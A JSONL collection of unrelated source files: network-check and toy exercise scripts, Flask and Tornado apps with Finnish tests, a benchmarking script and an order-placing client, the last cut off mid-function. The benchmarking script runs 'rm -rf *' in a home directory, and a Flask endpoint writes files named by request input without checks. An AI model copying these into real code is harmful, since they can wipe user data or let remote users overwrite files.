{"seq_id":"410638273","text":"import argparse\r\nimport logging\r\nimport multiprocessing\r\nimport os\r\n\r\nfrom executors import PingExecutor, ntpExecutor\r\n\r\n# For File Logging\r\n\r\nlog_filename = \"logs/app.log\"\r\nlog_format = \"%(asctime)s %(levelname)-8s %(name)-20s %(message)s\"\r\nos.makedirs(os.path.dirname(log_filename), exist_ok=True)\r\nlogger = logging.getLogger()\r\n\r\n# For File Logging\r\n\r\nhandler = logging.FileHandler(log_filename, \"a\")\r\nformatter = logging.Formatter(log_format)\r\nformatter.datefmt = \"%Y-%m-%d %H:%M:%S\"\r\nhandler.setFormatter(formatter)\r\nlogger.addHandler(handler)\r\nlogger.setLevel(logging.DEBUG)\r\n\r\n# For Console Logging - uncomment below to see the changes in the console\r\n\r\n# consoleHandler = logging.StreamHandler()\r\n# consoleHandler.setFormatter(formatter)\r\n# logger.addHandler(consoleHandler)\r\n\r\nargParser = argparse.ArgumentParser()\r\n\r\n\r\ndef define_arguments():\r\n    argParser.add_argument('-p', '--ping', nargs=\"+\", help=\"Ping IP Addresses.\")\r\n    argParser.add_argument('-r', '--reach', nargs=\"+\", help=\"Reach IP Addresses.\")\r\n    
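    # Illustrative note (not in the original file): nargs="+" gathers one or more
    # space-separated values into a list, so a hypothetical invocation such as
    #   python main.py --ping 10.0.0.1 10.0.0.2
    # would yield parsedargs.ping == ['10.0.0.1', '10.0.0.2'] in run_command() below.
    # (The IP addresses are made-up examples.)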
argParser.add_argument('-t', '--telnet', nargs=\"+\", help=\"Telnet command\")\r\n argParser.add_argument('-n', '--ntp', nargs=\"+\", help=\"NTP command\")\r\n\r\n\r\ndef run_command():\r\n define_arguments()\r\n parsedargs = argParser.parse_args()\r\n\r\n if parsedargs.ping:\r\n logger.debug(\"It is ping validation\")\r\n str = PingExecutor.executeByMultiThreading(parsedargs)\r\n logger.debug(\"Response in json format:%s\", str)\r\n print(str)\r\n elif parsedargs.reach:\r\n logger.debug(\"It is IP reachability check\")\r\n str = PingExecutor.executeByMultiprocessing(parsedargs)\r\n logger.debug(\"Response in json format:%s\", str)\r\n print(str)\r\n elif parsedargs.ntp:\r\n logger.debug(\"It is IP NTP check\")\r\n str = ntpExecutor.executeByMultiThreading(parsedargs)\r\n logger.debug(\"Response in json format:%s\", str)\r\n print(str)\r\n elif parsedargs.telnet:\r\n logger.debug(\"It is Telnet\")\r\n commandName = \"telnet\"\r\n\r\n\r\nif __name__ == '__main__':\r\n multiprocessing.freeze_support()\r\n run_command()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"47452003","text":"import math\r\n\r\n\r\ndef get_leap_years(start: int, end: int):\r\n list = []\r\n for i in range(start, end + 1):\r\n if i % 4 == 0 and i % 100 != 0:\r\n list.append(i)\r\n elif i % 400 == 0:\r\n list.append(i)\r\n return list\r\n\r\n\r\ndef test_get_leap_years():\r\n assert get_leap_years(2000, 2022) == [2000, 2004, 2008, 2012, 2016, 2020]\r\n assert get_leap_years(1990, 2000) == [1992, 1996, 2000]\r\n assert get_leap_years(1980, 1990) == [1980, 1984, 1988]\r\n\r\n\r\ndef get_perfect_squares(start: int, end: int):\r\n list = []\r\n for i in range(start, end + 1):\r\n if int(math.sqrt(i)) == float(math.sqrt(i)):\r\n list.append(i)\r\n return list\r\n\r\n\r\ndef test_get_perfect_squares():\r\n assert get_perfect_squares(10, 50) == [16, 25, 36, 49]\r\n assert get_perfect_squares(60, 80) == [64]\r\n assert get_perfect_squares(80, 100) == [81, 100]\r\n\r\n\r\ndef is_palindrome(n):\r\n inv = 0 # inversul lui n\r\n x = n # copie a lui n\r\n while n:\r\n inv = inv * 10 + n % 10\r\n n //= 10\r\n return inv == x # returneaza 1 daca n e palindrom sau 0 in caz contrar\r\n\r\n\r\ndef test_is_palindrome():\r\n assert is_palindrome(121) == True\r\n assert is_palindrome(12) == False\r\n assert is_palindrome(11) == True\r\n\r\n\r\ntest_get_leap_years()\r\ntest_get_perfect_squares()\r\ntest_is_palindrome()\r\n\r\n\r\ndef main():\r\n shouldRun = True\r\n while shouldRun == True:\r\n problema = input(\"Da numarul problemei: \")\r\n if problema == \"1\":\r\n print(\"Rezolvi problema 1: afiseaza toti anii bisecti intre doi ani dati(inclusiv anii dati) \")\r\n x = int(input(\"Alege inceputul intervalului: \"))\r\n y = int(input(\"Alege utimul element al intervalului: \"))\r\n listaAni = get_leap_years(x, y)\r\n print(\"Anii bisecti din intervalul dat sunt: \" + \", \".join(str(an) for an in listaAni))\r\n elif problema == \"2\":\r\n print(\"Rezolvi problema 2: afiseaza toate patratele perfecte dintr-un interval inchis dat\")\r\n x = int(input(\"Alege inceputul intervalului: \"))\r\n y = int(input(\"Alege utimul element al intervalului: \"))\r\n listaPatratePerfecte = get_perfect_squares(x, y)\r\n print(\"Patratele perfecte din intervalul dat sunt: \" + \",\".join(str(an) for an in listaPatratePerfecte))\r\n elif problema == \"3\":\r\n print(\"Rezolvi problema 3: Determina daca un numar dat 
este palindrom\")\r\n            x = int(input(\"Citeste n: \"))\r\n            rezultat = is_palindrome(x)\r\n            if rezultat == True:\r\n                print(\"Numarul ales este palindrom\")\r\n            else:\r\n                print(\"Numarul ales nu este palindrom\")\r\n        elif problema == \"x\":\r\n            print(\"Ai inchis programul\")\r\n            shouldRun = False\r\n        else:\r\n            print(\"Ai ales un numar gresit, te rog alege din nou! \")\r\n\r\n    pass\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"323506246","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nfrom ttastromech import TTAstromech\nimport sys\nimport argparse\n\n\ndef handleArgs():\n\tparser = argparse.ArgumentParser(description='Text to Astromech, creates astromech (R2-D2) sounds from text')\n\t# parser.add_argument('-v', '--version', help='print version number', version=__version__)\n\t# parser.add_argument('infile', nargs='?', type=argparse.FileType('r'), default=sys.stdin)\n\tparser.add_argument('phrase', help='phrase to speak', type=str)\n\t# parser.add_argument('--stdin', help='allows you to pipe string into ttastromech')\n\tparser.add_argument('-s', '--size', help='how much of the input text phrase should be turned into astromech. The input phrase will be trimmed to: phrase[:size]', type=int, default=10)\n\t# parser.add_argument('-p', '--path', help='path to write ar markers to, default is current directory', default='.')\n\n\targs = vars(parser.parse_args())\n\treturn args\n\n\nif __name__ == '__main__':\n\t# create an r2\n\tr2 = TTAstromech()\n\n\targs = handleArgs()\n\t# print(args)\n\n\t# allow a string to be piped in:\n\t# echo \"hi how are you\" | astromech-speak.py\n\t# if args['stdin']:\n\t# \t# print(sys.stdin)\n\t# \tfor i in sys.stdin:\n\t# \t\tr2.speak(i)\n\t# \t\texit(0)\n\n\tsize = args['size']\n\tphrase = args['phrase']\n\tphrase = phrase[:size]\n\tprint('Saying:', phrase)\n\n\tr2.speak(phrase)\n","sub_path":"bin/astromech-speak.py","file_name":"astromech-speak.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"373338051","text":"#!/usr/local/bin/python\n\nimport lib.config as config\nfrom lib.dispatch import Dispatcher\nfrom lib.handlers import handler_registry, script_dir\nfrom sys import argv\nimport os.path\n\ndefault = config.loads(\"\"\"{\n    \"default\" : {\n        \"job_type\": \"\"\n    },\n    \"jobs\": {\n\n    }\n}\"\"\")\n\nconfig = config.Config(os.path.join(script_dir(), 'ot.json'), default)\n\ndispatch = Dispatcher(config = config)\nfor i in handler_registry:\n    dispatch.register(*i) \n\nif len(argv) == 1:\n    dispatch(**config[\"default\"])\nelse:\n    for k in argv[1:]:\n        dispatch(**config[\"jobs\"][k])\n\nconfig.save()","sub_path":"octotemp.py","file_name":"octotemp.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"70858941","text":"from flask import Flask \nfrom flask import render_template, redirect, request, make_response, session, url_for, flash, g\nfrom utils import *\nfrom config import *\n\napp = Flask(__name__)\napp.debug = True\n# set the secret key. 
keep this really secret:\napp.secret_key = appConfig['secret_key']\n\n# register the modules \n# user module allows login and other user functions\nfrom users.views import mod as usersModule\napp.register_blueprint(usersModule)\n\n# tzone module - timezone stuff\nfrom tzone.views import mod as tzoneModule\napp.register_blueprint(tzoneModule)\n\n# init and teardown stuff \n@app.before_request\ndef before_request():\n g.appConfig = appConfig\n g.db = getConnection()\n\n@app.teardown_request\ndef teardown_request(exception):\n dropConnection()\n\n# home page \n@app.route('/')\n@templated(\"index.html\")\ndef index():\n return {\"title\": \"Welcome to Timezone Walrus\"}\n\n# create the server if running from the command line \nif __name__ == '__main__':\n app.run(host='0.0.0.0',debug=True)\n\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"38921282","text":"import subprocess\nimport os\nimport sys\nimport time \nimport statistics as stat\n\nPROJECT = sys.argv[1]\nREPETITIONS = int(sys.argv[2])\nTIMEOUT = int(sys.argv[3])\nARRAY_ID = int(sys.argv[4])\n\nHOME = \"/home/stefan\"\nCHOME = \"/media/raid/stefan\"\n\n# gehe zu tmp\nos.chdir(HOME)\n\n# mach ma sauber\nos.system(\"rm -rf *\")\n\nif not \"case_studies\" in os.listdir(\".\"):\n\tos.system(\"git clone https://github.com/smba/cpi_experiments.git case_studies\")\n\n# Obtain binaries\nos.chdir(HOME + \"/case_studies\")\nos.system(\"git pull\")\n\n# get access to binaries\nos.chdir(\"{}\".format(PROJECT))\n\npwd = os.getcwd()\nBINARIES = os.listdir(\".\")\nBINARIES_ABSOLUTE = [pwd + \"/\" + binary for binary in BINARIES]\nos.chdir(\"..\")\n\n# obtain configs\nconfigs = open(\"{}_configs.txt\".format(PROJECT), \"r\").readlines()\nconfig = configs[ARRAY_ID].replace(\"\\n\", \"\")\nconfig_tail = config.split(\" \")\n\nfname = \"perf_{}_{}.csv\".format(PROJECT, ARRAY_ID)\nos.system(\"rm -rf {}\".format(fname))\n\nfor j, binary in enumerate(BINARIES):\n\trev_index = int(binary.split(\"_\")[0]) # revision id\n\tdurations = []\n\tfor i in range(REPETITIONS): \n\t\ttime.sleep(2)\n\t\tstart = time.time()\n\t\ttry:\n\t\t\tsubprocess.run([\n\t\t\t\t\"timeout\", \n\t\t\t\t\"%d\" % TIMEOUT, \n\t\t\t\t\"{}\".format(BINARIES_ABSOLUTE[j])] + config_tail, check=True)\n\t\texcept:\n\t\t\ttime.sleep(2)\n\t\t\tpass\n\n\t\tend=time.time()\n\t\tduration = end - start\n\t\tdurations.append(duration)\n\n\tmedian = stat.median(durations)\n\n\tf = open(fname, \"a+\")\n\tf.write(\"{},{}\\n\".format(rev_index, median))\n\tf.close()\n\nos.system(\"cp {} {}/case_studies/results/{}/{}\".format(fname, CHOME, PROJECT, fname))\n\n","sub_path":"local-slurm.py","file_name":"local-slurm.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"569229425","text":"from flask import Blueprint, render_template\n\nimport utilities.utilities as utilities\n\nhome_blueprint = Blueprint(\n 'home_bp', __name__)\n\n\n@home_blueprint.route('/', methods=['GET'])\ndef home():\n return render_template(\n \"home/home.html\",\n genre_urls=utilities.get_genre_urls(),\n director_url=utilities.get_director_urls(),\n actor_urls=utilities.get_actor_urls()\n )\n # alphabet_urls=utilities.get_movies_by_title(),\n # director_url=utilities.get_movie_by_director(),\n # actor_url=utilities.get_movie_by_actor(),\n\n# we want the home page to show a title screen - welcoem to 
movies blah blaj have a collapsable nav bar nav bar - has\n# home button, buttons for all genres, and couple of buttons ith alphbets on them, director button, actor button,\n# realsie date, runtime minutes\n\n# home blueprint should have the following in render templete\n# 1. utilities.get_movie_by_title - alphabet - kinda like get articles by date from COVID web app\n# 2. utilities.get_movie by genre\n# 3. utilities.get_movie_by director - director button takes to first movie with all movies with director starting with A\n# 4.\n","sub_path":"home/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"220837828","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nKeräys-käsittelijä\n------------------\n\n\"\"\"\nfrom tornado.httpclient import HTTPRequest, AsyncHTTPClient, HTTPClient\n\nimport tornado.testing\nimport tornado\nimport tornado.web\nimport couch\nfrom WhipAroundRegistry import WarApp\nfrom TestBase import TestAsyncHTTPBase\n\n\nclass KeraysKasittelijaTest(TestAsyncHTTPBase):\n\n def setUp(self):\n self.fetchurl_fi = '/fi/kerays' # muuta minut\n self.fetchurl_sv = '/sv/insamling' # muuta minut\n self.baseurl_fi = '/fi' # älä muuta\n self.baseurl_sv = '/sv' # älä muuta\n self.tietokanta = couch.BlockingCouch(\"rahankeraysrekisteri\")\n super(KeraysKasittelijaTest, self).setUp()\n #tornado.testing.AsyncHTTPTestCase.setUp(self)\n\n def test_kerays_get_fi(self):\n \"\"\"\n KeraysKasittelija, HTTP GET /fi/kerays, elementit\n \"\"\"\n kaanna = self.fi\n # /fi/kerays\n self.http_client.fetch(self.get_url(self.fetchurl_fi), self.stop)\n response = self.wait()\n h1_title = '
<h1>' + kaanna('kerays_aloita_kerays_otsikko') + '</h1>'\n        self.assertIn(h1_title.encode(encoding='utf-8'), response.body)\n        # /fi/kerays/\n        self.http_client.fetch(self.get_url(self.fetchurl_fi + '/'), self.stop)\n        response = self.wait()\n        h1_title = '<h1>' + kaanna('kerays_aloita_kerays_otsikko') + '</h1>'\n        self.assertIn(h1_title.encode(encoding='utf-8'), response.body)\n\n    def test_kerays_get_sv(self):\n        \"\"\"\n        KeraysKasittelija, HTTP GET /sv/insamling, elementit\n        \"\"\"\n        kaanna = self.sv\n        # /fi/kerays\n        self.http_client.fetch(self.get_url(self.fetchurl_sv), self.stop)\n        response = self.wait()\n        h1_title = '<h1>' + kaanna('kerays_aloita_kerays_otsikko') + '</h1>'\n        self.assertIn(h1_title.encode(encoding='utf-8'), response.body)\n        # /fi/kerays/\n        self.http_client.fetch(self.get_url(self.fetchurl_sv + '/'), self.stop)\n        response = self.wait()\n        h1_title = '<h1>' + kaanna('kerays_aloita_kerays_otsikko') + '</h1>'\n        self.assertIn(h1_title.encode(encoding='utf-8'), response.body)\n\n    def test_kerays_get_id_fi(self):\n        \"\"\"\n        KeraysKasittelija, HTTP GET /fi/kerays/(1000 && 1001), elementit tietokannasta\n        \"\"\"\n\n        # /fi/kerays/1000\n        tulos = self.tietokanta.view(\"keraykset\", \"kerayksen_numerolla\", key=1000, limit=1)\n        self.assertGreater(len(tulos['rows']), 0, u\"Ei keräyksiä tietokannassa. Alusta testitietokanta.\")\n        kerays = tulos['rows'][0]['value']\n        self.http_client.fetch(self.get_url(self.fetchurl_fi + '/1000'), self.stop)\n        response = self.wait()\n        nimi_ascii = kerays[\"nimi\"].decode(\"utf-8\").encode(\"ascii\",\"ignore\")\n        body_ascii = response.body.decode(\"utf-8\").encode(\"ascii\",\"ignore\")\n        self.assertIn(nimi_ascii, body_ascii)\n\n        # /fi/kerays/1001/\n        tulos = self.tietokanta.view(\"keraykset\", \"kerayksen_numerolla\", key=1001, limit=1)\n        self.assertGreater(len(tulos['rows']), 0, u\"Ei keräyksiä tietokannassa. Alusta testitietokanta.\")\n        kerays = tulos['rows'][0]['value']\n        self.http_client.fetch(self.get_url(self.fetchurl_fi + '/1001/'), self.stop)\n        response = self.wait()\n        nimi_ascii = kerays[\"nimi\"].decode(\"utf-8\").encode(\"ascii\",\"ignore\")\n        body_ascii = response.body.decode(\"utf-8\").encode(\"ascii\",\"ignore\")\n        self.assertIn(nimi_ascii, body_ascii)\n\n    def test_kerays_get_id_muokkaa_fi(self):\n        \"\"\"\n        KeraysKasittelija, HTTP GET /fi/kerays/1000/muokkaa ANTAA 404\n\n        Tämä testi noutaa tietyn keräyksen muokkaussivun (/kerays/<id>/muokkaa\n        ja /kerays/<id>/muokkaa/)\n        ja tarkastaa, että sivulla esiintyy tietty teksti, mikä testataan\n        assertInillä.\n        \"\"\"\n        # /fi/kerays/1000/muokkaa\n        tulos = self.tietokanta.view(\"keraykset\", \"kerayksen_numerolla\", key=1000, limit=1)\n        self.assertGreater(len(tulos['rows']), 0, u\"Ei keräyksiä tietokannassa. Alusta testitietokanta.\")\n        kerays = tulos['rows'][0]['value']\n        self.http_client.fetch(self.get_url(self.fetchurl_fi + '/1000/muokkaa'), self.stop)\n        response = self.wait()\n        self.assertEqual(401, response.code)\n        nimi_ascii = kerays[\"nimi\"].decode(\"utf-8\").encode(\"ascii\",\"ignore\")\n        body_ascii = response.body.decode(\"utf-8\").encode(\"ascii\",\"ignore\")\n        self.assertNotIn(nimi_ascii, body_ascii)\n        self.assertNotIn(\"Muokataan\", body_ascii)\n        # /fi/kerays/1001/muokkaa/\n        tulos = self.tietokanta.view(\"keraykset\", \"kerayksen_numerolla\", key=1001, limit=1)\n        self.assertGreater(len(tulos['rows']), 0, u\"Ei keräyksiä tietokannassa. 
Alusta testitietokanta.\")\n kerays = tulos['rows'][0]['value']\n self.http_client.fetch(self.get_url('/fi/kerays/1001/muokkaa/'), self.stop)\n response = self.wait()\n nimi_ascii = kerays[\"nimi\"].decode(\"utf-8\").encode(\"ascii\",\"ignore\")\n body_ascii = response.body.decode(\"utf-8\").encode(\"ascii\",\"ignore\")\n self.assertNotIn(nimi_ascii, body_ascii)\n self.assertNotIn(\"Muokataan\", body_ascii)\n\n def test_kerays_get_ei_tunnistusta_fi(self):\n \"\"\"\n KeraysKasittelija, HTTP GET /fi/kerays/uusi ilman tunnistusta ei sallittu\n\n Tämä testi yrittää mennä uusi keräys -sivulle (/kerays/uusi) ilman\n kirjautumista ja tarkastaa, että palautus on 401 Unauthorized\n \"\"\"\n self.http_client.fetch(self.get_url('/fi/kerays/uusi'),\n self.stop)\n response = self.wait()\n self.assertIn(\"401: Unauthorized\", response.body)\n\n def test_kerays_get_tunnistuksella_fi(self):\n \"\"\"\n KeraysKasittelija, HTTP GET /fi/kerays/uusi tunnistuksella sallittu\n\n Tämä testi yrittää mennä uusi keräys -sivulle (/kerays/uusi)\n tunnistuksen jälkeen ja tarkastaa, että palautus EI OLE 401 Unauthorized\n \"\"\"\n self.kirjaudu_sisaan()\n self.http_client.fetch(self.get_url('/fi/kerays/uusi'),\n self.stop, headers=self.otsaketiedot)\n response = self.wait()\n self.assertNotIn(\"401: Unauthorized\", response.body)\n\n # TODO: def test_kerays_id_ilmoita_get(self)\n # TODO: def test_kerays_uusi_kirjautunut_get(self)","sub_path":"tests/TestKeraysKasittelija.py","file_name":"TestKeraysKasittelija.py","file_ext":"py","file_size_in_byte":6360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"337879946","text":"class Solution(object):\n class Graph(object):\n def __init__(self, V):\n self.V = V\n self.graph = [[0 for column in range(V)] for row in range(V)]\n\n def isBipartite(self, src):\n colorArr = [-1] * self.V\n colorArr[src] = 1\n queue = []\n queue.append(src)\n while queue:\n u = queue.pop()\n if self.graph[u][u] == 1:\n return False\n for v in range(self.V):\n if self.graph[u][v] == 1 and colorArr[v] == -1:\n colorArr[v] = 1 - colorArr[u]\n queue.append(v)\n elif self.graph[u][v] == 1 and colorArr[v] == colorArr[u]:\n return False\n return True\n\n def isBipartite(self, graph):\n \"\"\"\n :type graph: List[List[int]]\n :rtype: bool\n \"\"\"\n g = self.Graph(len(graph))\n g.graph = graph\n return \"Yes\" if g.isBipartite(0) else \"No\"\n\nsol = Solution()\nprint(sol.isBipartite([[1,3], [0,2], [1,3], [0,2]]))","sub_path":"LeetCodeContests/others/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"158408093","text":"from flask import Flask, json, request\nfrom ops import SaveCachePage\n\napp = Flask(__name__)\n\n\n@app.route('/api/save_cache_page', methods=['POST', 'GET'])\ndef save_cache_page():\n request_body = json.loads(request.data)\n # request_body = request.get_json()\n filename = request_body['filename'] + \".html\"\n filecontent = request_body['filecontent']\n try:\n if filecontent is not None:\n handler = SaveCachePage(filename, filecontent)\n handler.save_file()\n return handler.file_web_path\n return \"\"\n except Exception as ex:\n print(ex)\n return \"error\"\n\n\nif __name__ == '__main__':\n 
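    # Illustrative note (not in the original file): debug=True turns on Flask's
    # auto-reloader and interactive debugger, which is assumed here to be a
    # development-only convenience; it should not be left enabled in production.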
app.run(debug=True)\n","sub_path":"eCube_Hotel_2/Services/cache_page/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"37916967","text":"# A module used to create a heatmap of the users belonging to various regions of the world using latitude and longitude\r\nimport folium\r\nfrom folium.plugins import HeatMap\r\n\r\nclass heatmap:\r\n    def heatmap(df):\r\n        m = folium.Map([26.560000, 75.490000], zoom_start=1) # The coordinates that are used to map the various users within certain latitudes and longitudes\r\n        heat = df[['Latitude', 'Longitude']].as_matrix()\r\n        HeatMap(heat).add_to(m)\r\n        m.save('map.html') # Saving the heatmap created as a html file","sub_path":"func/heatMap.py","file_name":"heatMap.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"255820834","text":"import os\nimport numpy as np\nimport sys\nimport cv2\n\nTRAIN_DATA_FILE_NAME = \"train.txt\"\nTEST_DATA_FILE_NAME = \"test.txt\"\n\n\ndef define_output_redirecter():\n    orig_stdout = sys.stdout\n    f = None\n\n    def redirect(file):\n        nonlocal f  # rebind the enclosing f so restore() can close the redirected file\n        try:\n            if f != None:\n                f.close()\n        except:\n            pass\n        f = open(file, \"w\")\n        sys.stdout = f\n\n    def restore():\n        sys.stdout = orig_stdout\n        if f != None:\n            f.close()\n\n    return redirect, restore\n\n\ndef for_each_sample(path, fn):\n    \"\"\"\n    fn(sample, patient, patientDir)\n    - sample - sample file name\n    - patient - patient id \n    - patientDir - path to patient folder\n    \"\"\"\n    for patient in filter(lambda x: not x.startswith(\".\"), os.listdir(path)):\n        patientDir = os.path.join(path, patient)\n        for sample in os.listdir(patientDir):\n            fn(sample, patient, patientDir)\n\n\ndef isCancerSample(sampleName):\n    return int(sampleName.split(\"-\")[1].split(\".\")[0]) == 1\n\n\ndef save_data(train_data_set, test_data_set, path):\n    save_to_csv_file(train_data_set, path, TRAIN_DATA_FILE_NAME)\n    save_to_csv_file(test_data_set, path, TEST_DATA_FILE_NAME)\n\n\ndef save_to_csv_file(collection, path, file_name):\n    if not os.path.exists(path):\n        os.makedirs(path)\n    full_path = os.path.join(path, file_name)\n    print(\"Writing to: {}\".format(full_path))\n    with open(full_path, \"w\") as f:\n        for line in collection:\n            label = 1 if isCancerSample(line) else 0\n            f.write(\"{} {}\\n\".format(line, label))\n\n\ndef load_data(path, labels_as_categories=True, channels=1):\n    X, Y = get_data_from_csv_file(\n        os.path.join(path, TRAIN_DATA_FILE_NAME),\n        labels_as_categories=labels_as_categories,\n        channels=channels,\n    )\n    X_test, Y_test = get_data_from_csv_file(\n        os.path.join(path, TEST_DATA_FILE_NAME),\n        labels_as_categories=labels_as_categories,\n        channels=channels,\n    )\n    return X, Y, X_test, Y_test\n\n\ndef get_data_from_csv_file(\n    path, show_error=False, labels_as_categories=True, channels=1\n):\n    data = []\n    labels = []\n    with open(path) as file:\n        while True:\n            line = file.readline()\n            if not line:\n                break\n\n            sample_path, label = line.split(\" \")\n            array = np.load(sample_path)\n            if array.shape == (50, 50):\n                if channels == 1:\n                    data.append(array)\n                elif channels == 3:\n                    data.append(cv2.merge((array, array, array)))\n                else:\n                    raise Exception(\"Invalid channels number.\")\n\n                if labels_as_categories:\n                    labels.append([0.0, 1.0] if int(label) else [1.0, 0.0])\n                else:\n                    labels.append(int(label))\n            elif show_error:\n                print(\"Shape error: {}\".format(sample_path))\n    return (\n        np.asarray(data, 
dtype=\"f\").reshape([-1, 50, 50, channels]),\n np.asarray(labels, dtype=\"f\"),\n )\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"552386314","text":"import requests\nimport base64\nfrom global_setting import *\nimport random\nimport time\nfrom openpyxl import Workbook\nimport threading\ndef ramdom_decimal(max,decimal):\n import random\n a = round(random.randint(0,max)+ random.random(),decimal)\n return a\ndef get_date():\n from datetime import datetime\n now = datetime.now()\n date = now.strftime(\"%Y-%m-%d\")\n print(date)\n return date\nheader_test = {\n\"Host\": \"120.76.102.19:8034\",\n\"Content-Type\": \"application/json;charset=UTF-8\",\n\"Content-Length\": \"1940\",\n}\ndef get():\n pass\ndef get_authorizaiton():\n author = base64.b64encode(str.encode(username + \"&\" + password))\n au = author.decode()\n #print(au,type(au))\n return au\ndef post_ots(u,d,authorizaiton = None):\n re = requests.session()\n if authorizaiton is not None:\n header_test[\"Authorization\"] = \"Basic {}\".format(get_authorizaiton())\n #print(header_test)\n redata = re.post(url = u,json = d,headers = header_test).content.decode(\"utf-8\")\n print(\"result:\",redata)\ndef post_basic(u,d,authorizaiton = None):\n re = requests.session()\n if authorizaiton is not None:\n header_test[\"Authorization\"] = \"Basic {}\".format(get_authorizaiton())\n #print(header_test)\n redata = re.post(url = u,json = d,headers = header_test).content.decode(\"utf-8\")\n result = redata[redata.find('\"ResultDesc\":\"')+14:redata.find('\",\"Item\"')]\n print(\"result:\",result)\n if result == \"提交成功\":\n a = redata.find('\"WayBillNumber\":')\n b = redata.find(',\"SenderInfoStatus\"')\n orderid = redata[a+17:b-1]\n print( redata, \"\\n\",orderid)\n return [1,orderid]\n else:\n #result = redata[redata.find('\"Feedback\":\"') + 12:redata.find('\",\"AgentNumber\"')]\n #print(result)\n return [0,result]\n#get_authorizaiton()\ndef order(orderno,total,length,wide,height,weight):\n\n order_list = []\n order_fail = []\n wb = Workbook()\n ws = wb.active\n row = [\"单号\",\"单号类型\",\"袋牌号\",\"到货时间\",\"长(cm)\",\"宽(cm)\",\"高(cm)\",\"重量(kg)\",\"锁定产品\",\"使用客户重量(是/否)\"]\n ws.append(row)\n for i in range(int(total)):\n on = orderno + str(i+1)\n #random.randint(5,30)\n data[0][\"OrderNumber\"] = on\n data[0][\"Weight\"] = int(weight)\n data[0][\"Length\"] = int(length)\n data[0][\"Height\"] = int(height)\n data[0][\"PackageVolume\"] = int(wide)\n data[0][\"TrackingNumber\"] = random.randint(100000000,900000000)\n orderid = post_basic(u = urls[\"orderurl\"],d= data,authorizaiton=1)\n if orderid[0] !=0:\n order_list.append(orderid[1])\n ws.append([orderid[1], \"\", \"袋子号\", \"\",int(length) , int(wide), int(height), int(weight), \"\", \"是\"])\n #time.sleep(int(sleep))\n else:\n order_fail.append(orderid[1])\n #wb.save(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\批量签入签出\"+ get_date() + \".xlsx\")\n return [order_list,order_fail]\ndef order_random(orderno,total,filename):\n def ramdom_decimal(max, decimal):\n import random\n a = round(random.randint(0, max) + random.random(), decimal)\n return a\n def get_date():\n from datetime import datetime\n now = datetime.now()\n date = now.strftime(\"%Y-%m-%d\")\n print(date)\n return date\n no = [\"01\",\"02\",\"03\",\"04\",\"05\",\"06\",\"07\",\"08\",\"09\",\"10\",]\n order_list = []\n order_fail = []\n wb = Workbook()\n ws = wb.active\n row = 
[\"单号\",\"单号类型\",\"袋牌号\",\"到货时间\",\"长(cm)\",\"宽(cm)\",\"高(cm)\",\"重量(kg)\",\"锁定产品\",\"使用客户重量(是/否)\"]\n ws.append(row)\n try:\n for i in range(int(total)):\n on = orderno + str(i+1)\n #random.randint(5,30)\n data[0][\"OrderNumber\"] = on\n data[0][\"Weight\"] = ramdom_decimal(10,3)\n data[0][\"Length\"] = ramdom_decimal(10,0)\n data[0][\"Height\"] = ramdom_decimal(10,0)\n data[0][\"PackageVolume\"] = ramdom_decimal(10,0)\n data[0][\"TrackingNumber\"] = random.randint(100000000,900000000)\n orderid = post_basic(u = urls[\"orderurl\"],d= data,authorizaiton=1)\n if orderid[0] != 0:\n order_list.append(orderid[1])\n ws.append([orderid[1], \"\", \"袋子号\", \"\",data[0][\"Length\"] , data[0][\"PackageVolume\"], data[0][\"Height\"], data[0][\"Weight\"], \"\", \"是\"])\n #time.sleep(int(sleep))\n else:\n order_fail.append(orderid[1])\n #time.sleep(int(sleep))\n # wb.save(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\批量签入签出\"+ filename + \".xlsx\")\n wb.save(\"doc//批量签入签出\" + filename + \".xlsx\")\n except Exception as e:\n try:\n # wb.save(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\批量签入签出\"+ filename + \".xlsx\")\n print(\"下单失败:\",e)\n wb.save(\"doc//批量签入签出\" + filename + \".xlsx\")\n except Exception as e:\n #wb.save(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\批量签入签出\" + filename + str(random.choice(no)) + \".xlsx\")\n print(\"保存失败:\",e)\n wb.save(\"doc//批量签入签出\" + filename + str(random.choice(no)) + \".xlsx\")\n return [order_list,order_fail]\ndef order_thread(orderno,i):\n lock.acquire()\n on = orderno + str(i + 1)\n print(on)\n # random.randint(5,30)\n 